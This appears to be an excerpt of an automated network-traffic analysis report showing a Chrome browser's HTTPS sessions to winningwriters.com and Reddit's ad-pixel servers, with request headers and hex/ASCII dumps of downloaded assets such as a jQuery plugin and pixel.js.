                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: cc c9 07 15 80 d2 ff 00 d4 67 d1 2e db bf ef 15 2b 01 75 6f 6b 75 54 d6 b8 ad 46 bb 87 90 03 8a 9a 6d f0 07 55 2d f0 e9 49 99 89 08 0c 41 ad f4 d7 e8 2f a6 1f f3 1b ed 46 6f 3b 9d 32 94 d9 5e 98 7d 46 a6 05 8d aa e7 30 f9 67 e7 73 94 af b2 03 d6 74 6d af 42 5d 75 0e d1 42 c3 a7 ac a8 51 b8 dc a8 58 52 3a 69 0a 95 3c df e5 53 ab a5 ad 14 d8 e2 5d e1 01 0e ac 65 28 0f a6 ff 00 46 3a 16 df d3 7f 4c ba 53 a4 28 0a 7a b6 dd b6 9d 4b 97 51 60 63 5f 75 7a e3 77 5c e9 01 be 26 ba a8 6c b8 4a 50 18 a9 fe e3 9d 3a ed eb d0 53 7e d7 86 3b 64 de 05 7d 04 12 2a 8b ab 4a d4 4b 4a 34 96 81 a0 38 e0 89 8c 07 c8 57 aa 04 25 6b 22 29 97 1f 32 af 99 53 e6 23 51 0f 0a 11 8f 6e b2 a2 4a 12 03 17 df 62 dd 48 c6 80 1c e7 b5 a8 7c 6c 56 92 e7 b5 02 02 40 c4 19 40 73 33 62 a3 73
                                                                                                                                                                                            Data Ascii: g.+uokuTFmU-IA/Fo;2^}F0gstmB]uBQXR:i<S]e(F:LS(zKQ`c_uzw\&lJP:S~;d}*JKJ48W%k")2S#QnJbH|lV@@s3bs
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: 20 d7 29 99 19 67 01 f3 0b ea 45 f5 dd 2b 67 36 ad bb ed ab b1 a8 1f 4d 5a fa 9a b4 87 56 18 b9 a1 01 45 ce 03 1d 2d 7a a3 a5 a8 ee f4 f6 6b fd ef 65 b7 de 6b e9 34 76 9b 8b fb 5a 57 af 15 1c 41 d7 45 f5 41 63 de 48 20 38 b4 bc c8 40 56 7a f3 6f b2 af d3 77 b4 6a b1 b5 59 56 ce b3 6b 07 69 d0 c6 be 8b dc 03 58 0e 05 06 93 8e 50 18 bd e9 ce cf 77 d3 cf 7d 7a 95 52 9b ab 3d d3 d4 5a ca 6e d3 a5 ca e3 a9 ba 80 f1 34 2a 60 60 32 ff 00 67 dc da fb 56 2c c5 49 d3 21 c1 e4 38 b7 c4 0b 5a 74 91 a4 c8 91 2c a5 00 5d 55 63 dd 51 a8 d6 6b 70 a7 ab 4e b6 3d 0e 96 d5 68 72 b4 8a 68 17 48 00 e3 38 0a 15 de aa 8e 7d 36 7f 2d ae f1 55 9e 97 3e a5 30 8e 5c a9 ea 69 50 06 62 03 c8 6e c0 6b a9 c5 81 ad 6a 78 51 ae 5f 11 00 62 c5 93 88 39 f6 40 78 7b eb 77 37 58 51 ae 93 7c
                                                                                                                                                                                            Data Ascii: )gE+g6MZVE-zkek4vZWAEAcH 8@VzowjYVkiXPw}zR=Zn4*``2gV,I!8Zt,]UcQkpN=hrhH8}6-U>0\iPbnkjxQ_b9@x{w7XQ|
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: ee 24 d4 45 12 cb 1c a0 33 0b 6a ac 2e eb 51 a7 51 52 9d 40 e6 87 02 d2 10 2b 51 26 5c 4f ca b0 17 92 98 02 d1 a5 a8 7c 20 38 92 08 73 a6 88 02 10 e0 a8 9c e0 1d ab 40 a3 4c e1 a5 4b f5 82 49 04 0f 09 2e 9b f4 b9 c9 c5 25 01 c5 73 6d a6 8d c5 5d 20 38 53 a8 fa ba 81 3a a9 bb c3 4e 9e a3 20 e2 7e 50 10 94 c8 40 6a ff 00 d5 db ef d7 f5 56 f5 b9 55 ab ae 86 ca da b6 d6 cd 7b ff 00 96 eb a7 78 5f 50 96 94 46 54 56 86 81 8b 60 3c ef a4 5d 38 6e 6b 37 7b a8 c6 55 17 77 62 85 2a 95 54 07 52 35 3c db 9a a4 64 d2 d6 c8 aa 84 48 0b c2 cd ae 96 f7 d7 15 ad 29 03 54 39 f4 8d 2a 6d f1 79 67 58 76 a4 05 5a c6 52 01 0c d3 51 51 01 91 3d 2d d3 f5 19 56 ae dd 51 8f a9 56 f3 76 a5 6f 4d 29 b8 bc 50 6b 05 41 e4 01 f3 b2 a0 66 80 3b 56 42 03 29 36 dd 9e d7 61 a9 60 eb 96 84
                                                                                                                                                                                            Data Ascii: $E3j.QQR@+Q&\O| 8s@LKI.%sm] 8S:N ~P@jVU{x_PFTV`<]8nk7{Uwb*TR5<dH)T9*mygXvZRQQ=-VQVvoM)PkAf;VB)6a`
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: e0 2a 30 85 06 9b 8a a3 10 a3 d8 5a 53 50 0e f8 c0 79 fd cf 71 36 cf 1a 1c 2a 37 c4 e3 a9 5c 41 6a f8 ab eb 23 4b 4a c8 83 97 b0 2c 6f 5b fa ab 6f b2 35 b4 ec 2a 36 e7 71 aa 7c 91 e5 b8 7e 9a 83 9c e0 d7 9a ae 0e 9e 92 88 1b 22 64 4a 40 60 ef a9 dd 53 79 bf 6f 2f 1b b5 cd 7b eb c6 dd b2 ca de 8b ea 6b 00 3c a0 0c a7 ab 45 0a 4d d4 48 41 97 7c 06 e5 7f d9 c3 d1 3e 84 df fa 1b d6 5f 54 fa a7 65 b5 a5 7f d3 3d 45 b3 da 33 72 ba 6b 6a 03 d2 fb 6d ad 6d e3 75 b7 b5 7d 56 2d 3f d6 57 a6 cf 35 c3 e6 a7 4f 4e 06 61 b8 af a5 5b 9d a3 ad fd 55 f5 0f d4 2a d6 f6 f4 3f ce 1f 4e 77 0d 8f 63 da 2a db 30 57 d9 f6 1d a2 ad 7b 0d a6 ad 46 95 35 28 df d2 76 a2 e0 24 e7 15 c9 42 c5 50 e9 a4 a7 79 b3 df b2 cf f5 7d 29 7d 7d 63 b8 53 73 29 04 a5 42 ea a9 06 ad 16 80 fa 74 ad
                                                                                                                                                                                            Data Ascii: *0ZSPyq6*7\Aj#KJ,o[o5*6q|~"dJ@`Syo/{k<EMHA|>_Te=E3rkjmmu}V-?W5ONa[U*?Nwc*0W{F5(v$BPy})}}cSs)Bt


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            57192.168.2.164978066.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:09 UTC846OUTGET /assets/js/pageslide.js HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007
                                                                                                                                                                                            2024-11-18 20:00:09 UTC365INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:09 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "81f-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 2079
                                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:09 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Content-Type: text/javascript
                                                                                                                                                                                            2024-11-18 20:00:09 UTC2079INData Raw: 2f 2a 0a 20 2a 20 6a 51 75 65 72 79 20 70 61 67 65 53 6c 69 64 65 0a 20 2a 20 56 65 72 73 69 6f 6e 20 32 2e 30 0a 20 2a 20 68 74 74 70 3a 2f 2f 73 72 6f 62 62 69 6e 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 70 61 67 65 73 6c 69 64 65 2f 0a 20 2a 0a 20 2a 20 6a 51 75 65 72 79 20 4a 61 76 61 73 63 72 69 70 74 20 70 6c 75 67 69 6e 20 77 68 69 63 68 20 73 6c 69 64 65 73 20 61 20 77 65 62 70 61 67 65 20 6f 76 65 72 20 74 6f 20 72 65 76 65 61 6c 20 61 6e 20 61 64 64 69 74 69 6f 6e 61 6c 20 69 6e 74 65 72 61 63 74 69 6f 6e 20 70 61 6e 65 2e 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 31 20 53 63 6f 74 74 20 52 6f 62 62 69 6e 20 28 73 72 6f 62 62 69 6e 2e 63 6f 6d 29 0a 20 2a 20 44 75 61 6c 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74
                                                                                                                                                                                            Data Ascii: /* * jQuery pageSlide * Version 2.0 * http://srobbin.com/jquery-pageslide/ * * jQuery Javascript plugin which slides a webpage over to reveal an additional interaction pane. * * Copyright (c) 2011 Scott Robbin (srobbin.com) * Dual licensed under t


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            58192.168.2.1649785151.101.193.1404436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:09 UTC614OUTGET /ads/conversions-config/v1/pixel/config/t2_11an1ubt_telemetry HTTP/1.1
                                                                                                                                                                                            Host: www.redditstatic.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Origin: https://winningwriters.com
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:09 UTC868INHTTP/1.1 200 OK
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Content-Length: 86
                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                            cache-control: max-age=300
                                                                                                                                                                                            content-type: application/json
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:09 GMT
                                                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                                                            Vary: Accept-Encoding,Origin
                                                                                                                                                                                            Server: snooserv
                                                                                                                                                                                            Report-To: {"group": "w3-reporting-nel", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-nel.reddit.com/reports" }]}, {"group": "w3-reporting", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting.reddit.com/reports" }]}, {"group": "w3-reporting-csp", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-csp.reddit.com/reports" }]}
                                                                                                                                                                                            NEL: {"report_to": "w3-reporting-nel", "max_age": 14400, "include_subdomains": false, "success_fraction": 0.02, "failure_fraction": 0.02}
                                                                                                                                                                                            2024-11-18 20:00:09 UTC86INData Raw: 7b 22 76 65 72 73 69 6f 6e 5f 68 61 73 68 22 3a 22 34 39 32 36 37 62 63 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 64 64 69 74 73 74 61 74 69 63 2e 63 6f 6d 2f 61 64 73 2f 34 39 32 36 37 62 63 65 2f 70 69 78 65 6c 2e 6a 73 22 7d
                                                                                                                                                                                            Data Ascii: {"version_hash":"49267bce","url":"https://www.redditstatic.com/ads/49267bce/pixel.js"}


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            59192.168.2.1649786151.101.1.1404436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:09 UTC356OUTGET /ads/pixel.js HTTP/1.1
                                                                                                                                                                                            Host: www.redditstatic.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:09 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Content-Length: 12126
                                                                                                                                                                                            Last-Modified: Tue, 15 Oct 2024 19:34:59 GMT
                                                                                                                                                                                            ETag: "5e9ac3a42b557bf8ca38cf2e8baba70b"
                                                                                                                                                                                            x-amz-server-side-encryption: AES256
                                                                                                                                                                                            Cache-Control: public, max-age=60
                                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                                            Content-Type: application/javascript
                                                                                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:09 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,Origin
                                                                                                                                                                                            Server: snooserv
                                                                                                                                                                                            Report-To: {"group": "w3-reporting-nel", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-nel.reddit.com/reports" }]}, {"group": "w3-reporting", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting.reddit.com/reports" }]}, {"group": "w3-reporting-csp", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-csp.reddit.com/reports" }]}
                                                                                                                                                                                            NEL: {"report_to": "w3-reporting-nel", "max_age": 14400, "include_subdomains": false, "success_fraction": 0.02, "failure_fraction": 0.02}
                                                                                                                                                                                            2024-11-18 20:00:09 UTC1378INData Raw: 1f 8b 08 00 00 00 00 00 00 03 d4 3b 6b 73 da c8 96 7f 05 ab 6e b8 92 69 cb 80 b1 93 08 6b 5c 04 e4 98 89 8d bd 3c 9c 4c b9 18 4a 96 1a 50 22 24 46 12 71 bc 86 fd ed 7b fa 25 b5 04 b6 93 3b 3b 1f 36 95 42 dd 7d 4e 9f 77 9f 3e dd 92 f7 a6 ab c0 49 bc 30 28 45 2a 46 01 4a b4 a7 74 24 54 3d 34 d5 9e bc a9 ba 17 dc 79 63 d6 c2 b4 f5 dd 8e 4a 8e a9 08 54 c5 34 93 c7 25 0e a7 a5 08 ff b5 f2 22 5c 2e f3 46 93 cc 99 96 cb 8e 16 e1 64 15 05 25 07 88 ee 55 35 32 be 12 63 2b 3e 46 a8 da 66 80 1f 4a 56 14 85 91 aa b4 ed 20 08 93 d2 d4 0b dc d2 22 74 57 3e 2e fd 5b a9 78 15 e5 df 8a d6 4c e6 51 f8 50 b2 75 27 74 b1 a9 5c 5d 77 46 97 d6 a4 77 3d 9c 9c 5f 8f 7a 1d 05 d9 1b 42 6f 69 12 d9 cd 27 fc 63 19 46 49 6c 3c 6d 36 4d a2 c3 5d 75 ac 3b b6 ef ab 4b 9d 83 90 d0 46 8d
                                                                                                                                                                                            Data Ascii: ;ksnik\<LJP"$Fq{%;;6B}Nw>I0(E*FJt$T=4ycJT4%"\.Fd%U52c+>FfJV "tW>.[xLQPu't\]wFw=_zBoi'cFIl<m6M]u;KF
                                                                                                                                                                                            2024-11-18 20:00:09 UTC1378INData Raw: 35 f4 02 55 21 55 c8 12 ba 52 28 00 06 cc cb 94 67 fd 4b 16 4d ac c3 63 0b 15 bc 28 63 12 5f d6 b5 4c bb 23 58 a4 94 11 f1 20 a7 02 9b 27 d8 1f ce 82 75 0d 81 8c 74 ed 7a 6f de ed 37 5e f5 af cc e9 b0 4e 72 fd 25 54 64 41 8d bb 96 77 fe 31 ef fa 94 fe df 77 b0 44 87 39 8f 39 4c 9f 46 e1 82 8c b6 61 1b a0 6e cf fc 27 4f 79 d6 85 0c 29 e7 c5 74 88 3b 32 ed 3f e3 cb 02 3e 55 4a 56 65 6d aa a0 41 39 23 e3 70 79 5b 89 ea 69 c2 97 a0 e8 ab be 2c 70 22 ce 1c 25 d3 77 dc 95 b4 f9 8a 23 a5 d2 de c5 64 eb 1c f5 bb ed 70 b1 84 4c 04 c1 86 63 c7 5e 62 95 c5 84 b4 9b 66 04 b4 b4 dc 07 5a c5 52 ff ca f6 c1 86 0b a8 e6 47 c3 f3 83 77 25 d7 4e 6c 85 08 59 b0 f9 0a 04 a5 16 e7 92 70 7e 14 4b 5d 05 5c 0a b6 b5 e7 e4 13 13 35 42 f4 c3 6a 3a c5 11 76 3f f8 a1 f3 ad e5 cf c2
                                                                                                                                                                                            Data Ascii: 5U!UR(gKMc(c_L#X 'utzo7^Nr%TdAw1wD99LFan'Oy)t;2?>UJVemA9#py[i,p"%w#dpLc^bfZRGw%NlYp~K]\5Bj:v?
                                                                                                                                                                                            2024-11-18 20:00:09 UTC1378INData Raw: 3e a6 01 51 71 68 ef 68 4c e3 a2 e2 d2 5e 63 4c c3 a3 82 69 ef 78 4c a3 a4 32 a5 bd 93 31 0d 96 ca 8c f6 de 8e 69 cc 54 e6 eb 2a 0d d7 f3 ad 7a 88 65 bb 9f 3a d5 04 64 09 0e c3 c4 f6 cd 77 fb c5 63 15 83 5e e2 69 02 c0 5c 81 2d 6a 81 94 e6 5d 8a 0a 46 3d 86 93 7d ad fe 8e 9e df d3 f1 37 47 f5 4c 84 bb 5a a3 a2 a6 a0 ca 49 03 66 bd 3f 3d 6d 68 63 96 19 a7 7e 08 8b 2c 13 ee 30 4b 5e 9a 4c e5 f8 39 2a d9 d4 fc c9 c0 6c ec 67 27 09 7e 6b b1 ab cc 64 ab fa c5 43 00 cf 3b af 1c 03 68 d2 91 f2 44 fe 18 00 55 56 bb 90 c7 72 a5 a6 ca 60 a4 2c 23 f5 e0 6e cc b4 50 14 d8 bc 60 43 69 9d c0 c6 ff 3f 96 09 c7 3f 51 26 28 ab 18 97 c8 c5 02 68 46 f7 0a cf 45 ed eb de 60 d8 ea 0d 07 66 4e 76 fa 12 2c 89 15 72 e1 49 2c 26 43 d9 08 80 c8 1b 64 18 c6 71 42 77 8b 2f 57 97 17
                                                                                                                                                                                            Data Ascii: >QqhhL^cLixL21iT*ze:dwc^i\-j]F=}7GLZIf?=mhc~,0K^L9*lg'~kdC;hDUVr`,#nP`Ci??Q&(hFE`fNv,rI,&CdqBw/W
                                                                                                                                                                                            2024-11-18 20:00:09 UTC1378INData Raw: 86 7f dc 58 06 db 6c 21 57 92 87 82 a8 6c f0 03 8c 05 da c0 ba b4 da c3 eb 1c fe a4 3d 18 f0 39 a4 a9 f0 6d 6b 68 7d 19 8a 61 d2 a6 f4 08 df 61 ab db 1b 50 c2 69 8f c1 ac 2f b0 b0 19 80 36 81 6f 1a f1 40 00 b2 54 c6 19 b6 2c 0b 16 2a 7d 90 8d 85 89 05 69 9f b7 e4 b9 45 a1 89 b8 29 90 4a cc 64 4d c7 a8 b8 1b f2 8f 7e b8 fc f6 3f 39 25 bc 7a 44 80 ea eb bf 56 38 7a 84 34 0a eb 3f c9 9f 16 fe 22 10 f1 19 9a be 85 8a 58 6d 1c cb 53 f8 10 50 26 1b fc f7 86 0c a3 5b be 86 6c 58 b8 de 02 2a 42 28 59 60 35 d3 d4 9d 95 8c 04 29 fd c0 8b 1c 4d 3a e4 ed 05 61 4e 26 a9 5a 45 d1 95 0a 41 da 34 b9 da fa 4e 82 bb 06 85 a1 c8 3d 1a b9 9f 1b 01 99 73 f2 09 01 85 de d6 33 29 1c 36 42 b2 18 ff 56 73 e9 7b 89 29 0d d3 57 74 50 3e eb 4a 7a 1a a6 23 fc c0 7d 5a 3f 93 90 0d 0a
                                                                                                                                                                                            Data Ascii: Xl!Wl=9mkh}aaPi/6o@T,*}iE)JdM~?9%zDV8z4?"XmSP&[lX*B(Y`5)M:aN&ZEA4N=s3)6BVs{)WtP>Jz#}Z?
                                                                                                                                                                                            2024-11-18 20:00:09 UTC1378INData Raw: b6 ae e6 1f 24 43 dd 92 73 ec 75 6f 3c 3c 93 bf 72 1b 3d bb 28 c6 75 d6 9f 74 4c 64 b6 7d 3a a1 01 67 2b 68 f4 e5 16 b8 54 98 68 58 f6 4a 39 8f cb 5c 27 36 e8 bd 55 41 1a 3b 4e d8 20 c8 93 44 96 3a 9a dd 8c e4 36 a1 5f 96 49 77 15 7d 8a b0 99 dc 3d d7 7d b8 12 71 5c 14 85 22 4c 22 23 b4 d5 e7 4e 90 2d c7 a1 81 94 0b b6 6c 70 38 2f cb 2d 36 bb de 5f 14 bd 41 43 99 36 9a 32 b2 7d 96 4a 10 96 49 d8 33 77 1f 74 19 50 3c e5 7a 60 2b 7d 94 8d d4 22 2b 8e e1 f8 be 35 5a d8 07 54 e9 0c 4a ac d7 36 c6 87 c9 e0 86 37 06 e2 16 b6 1a 68 17 66 a0 f5 16 a6 d8 e0 d7 61 6f 77 50 fe d2 31 3a 86 cd e6 f3 f8 8e c7 c8 4e ea 30 e0 14 e6 e8 29 1c 16 cf a6 73 d9 69 4b cd 30 7d d4 b9 9f 60 36 0f 70 32 b0 6f 3e 49 4f 2f 67 af 16 90 59 ab ad 3b 3c 42 f2 16 fa 66 10 b8 9d b6 68 bb
                                                                                                                                                                                            Data Ascii: $Csuo<<r=(utLd}:g+hThXJ9\'6UA;N D:6_Iw}=}q\"L"#N-lp8/-6_AC62}JI3wtP<z`+}"+5ZTJ67hfaowP1:N0)siK0}`6p2o>IO/gY;<Bfh
                                                                                                                                                                                            2024-11-18 20:00:09 UTC1378INData Raw: eb 04 a4 26 b6 c5 64 62 66 52 c6 ee 78 a0 a6 b6 4a d8 b0 ad c3 ca 5b 30 96 b8 e1 f0 06 b5 7a ab 8f 8d 99 8a 40 2f e0 97 75 40 27 a8 9b 13 ed 46 b0 ae 9f 19 48 51 06 df 08 70 d0 10 11 4c aa 36 f5 cd 2e 1e d7 40 84 b5 00 49 08 11 6c 56 4a b8 34 a9 79 04 4e ca 0c 48 b7 4d 8b 54 0f 82 85 24 da 62 52 44 da 42 96 32 a8 12 bc 11 50 73 ed 77 90 8a dd 03 47 b4 db c2 a2 4b 91 84 03 5d 2a d6 67 4e 49 af 6e a0 4d 57 a9 28 d3 b8 0c 5d c6 d8 68 bd b9 24 d6 10 1b dd f7 e3 8a 7c 59 ff 53 78 a2 23 37 7c 2b 67 bc e7 f2 13 67 94 06 f1 d7 ee 7c 8c e1 a8 e4 a0 9a e7 3a ec ed 1c 98 35 1c 13 00 07 55 52 86 d9 7f 89 6f 64 ba 5f 4b b1 b6 81 4d 6f 57 d2 ac b9 b2 4f 76 eb ff 00 47 57 23 6a d5 e8 31 a3 c5 1f 4d 4b be ff c2 34 49 7f 4c 9c 89 ee b8 d8 22 1c db 6f 31 e6 7d ff cd d3 6d
                                                                                                                                                                                            Data Ascii: &dbfRxJ[0z@/u@'FHQpL6.@IlVJ4yNHMT$bRDB2PswGK]*gNInMW(]h$|YSx#7|+gg|:5URod_KMoWOvGW#j1MK4IL"o1}m
                                                                                                                                                                                            2024-11-18 20:00:09 UTC1378INData Raw: 00 e1 72 d9 a2 2f 24 2b f9 5c 52 52 4f c8 e5 3f 55 df de 80 6f a2 0c 78 b2 e9 f0 3d 94 0e 4f 32 dd 5b 4b 08 4c c9 c2 7f 8e 37 7a 70 4e ab 0d 5b 4a 73 62 8b 13 38 0e 42 d6 33 78 a8 5b 81 63 3a 4a 28 78 b0 7b b0 9f 23 d2 46 98 11 35 03 50 d0 b1 2c e1 6b 03 41 0d da f0 13 23 aa 36 84 0b 93 79 a8 85 b8 d8 1d 18 c8 19 3b eb 72 95 4a 92 b9 8e 92 b1 a2 d6 40 2a 6d 0f 9d 03 70 c6 9c 02 87 b9 03 5a f3 d4 54 44 2c 45 c2 d6 ad 73 0a d0 23 09 1c c3 a6 72 5d ab 47 1b 97 ef 36 56 86 9d 88 54 4f 1a ea 40 03 eb 77 4d dd 7e 64 8c a0 aa be 69 04 31 2e 44 a0 32 ad b2 a2 f4 c7 6f d6 dc 11 c1 a8 cd 9a 8f 44 64 3a 28 75 e2 83 fd 9d 8c 5c 09 f6 86 da 52 5d 45 af 8f da c2 d7 6a dc a6 9d 44 ad ef 99 1f 00 e0 e9 38 77 49 29 15 74 0f 0e 7b 6e 79 35 6a 47 de c1 48 41 ee 91 38 00 67
                                                                                                                                                                                            Data Ascii: r/$+\RRO?Uox=O2[KL7zpN[Jsb8B3x[c:J(x{#F5P,kA#6y;rJ@*mpZTD,Es#r]G6VTO@wM~di1.D2oDd:(u\R]EjD8wI)t{ny5jGHA8g
                                                                                                                                                                                            2024-11-18 20:00:09 UTC1378INData Raw: 3f 38 72 95 0e b2 88 01 59 ae 94 15 dd 80 68 b5 1a 7b 31 c7 00 4e 15 98 79 aa be 42 41 2e ad b8 4b 18 e0 29 5e 1c 72 32 0d 02 c6 54 3c d7 0e 82 14 2d 24 02 89 53 07 11 20 c9 35 ff a3 31 9b fc ab dd 0f c9 b5 0e db be 73 09 17 60 61 00 0a c0 b2 41 62 2e 72 d9 aa 9d 89 d6 95 d4 ff 50 a6 53 b4 1c 2e f1 42 1d 20 cb 40 e5 e6 89 a4 0d 29 31 4b 12 e6 85 89 0f 64 f2 d5 fd dd 12 4a b8 90 2a 74 10 f4 a6 d9 d6 7d 98 4c 66 7a af 48 ea 33 96 92 3d 11 11 7d 9a da de 67 7f 11 76 43 9f fd 20 a2 bb e4 ec 99 a8 d8 99 66 cd 6d d7 c5 59 d8 0d 3c 5c 96 56 b1 41 cd 9a 58 6d 64 07 9f 35 7f a8 88 63 14 ec b2 b3 9d 47 62 a5 c6 21 db 79 ec 03 f0 9d 7c b6 03 5a c1 9d ff b6 d0 0f a0 77 fc e0 6c f2 95 c2 23 a2 db 70 37 e8 fe f5 44 ca 36 48 ee 54 d8 6b 63 56 e6 51 2d 58 8b e3 62 8a 1d
                                                                                                                                                                                            Data Ascii: ?8rYh{1NyBA.K)^r2T<-$S 51s`aAb.rPS.B @)1KdJ*t}LfzH3=}gvC fmY<\VAXmd5cGb!y|Zwl#p7D6HTkcVQ-Xb
                                                                                                                                                                                            2024-11-18 20:00:09 UTC1102INData Raw: 5b df 22 35 f0 65 76 da d6 21 b8 5e 4c 2e 2f 7b 98 24 bf 09 4f e9 af 2e b5 26 46 c0 65 c4 9a 69 01 88 e4 57 00 92 c8 1d e2 ad 7c c8 74 45 19 9e da b3 0a fa fd b4 8d 19 49 82 44 64 78 56 cf 00 a6 08 30 05 80 a5 b9 88 c8 08 cc 8e 15 bb f2 7e 53 6e 35 9a ab 49 ba de a2 75 ca db 29 21 5d 9e 68 d8 2e f8 59 10 ef 72 84 62 eb ce 15 77 e3 22 29 45 8e 39 e4 e4 07 a3 49 6f a6 8a a5 22 19 23 be a0 84 ba ba 89 c0 80 b9 1c c0 41 b6 72 92 49 81 10 5f 91 59 56 12 51 c2 a6 84 f5 4a 54 6f 84 2e d1 a0 3b 32 a1 b2 45 82 f5 60 2f 45 8b 24 27 64 c7 b3 86 20 5d 50 a4 50 d3 39 5a 57 e5 84 8f 36 47 50 18 70 12 58 55 23 86 d6 41 ba 19 54 0c 0d f2 7b 33 c3 d7 e0 d3 0f 74 a1 b4 d7 8f 15 b5 19 38 95 bc 58 98 d1 e4 df af 12 60 0c 86 4a 3c 80 42 78 da 01 2a a5 07 c7 4c 40 cb d0 8b 1e
                                                                                                                                                                                            Data Ascii: ["5ev!^L./{$O.&FeiW|tEIDdxV0~Sn5Iu)!]h.Yrbw")E9Io"#ArI_YVQJTo.;2E`/E$'d ]PP9ZW6GPpXU#AT{3t8X`J<Bx*L@


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            60192.168.2.164978366.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
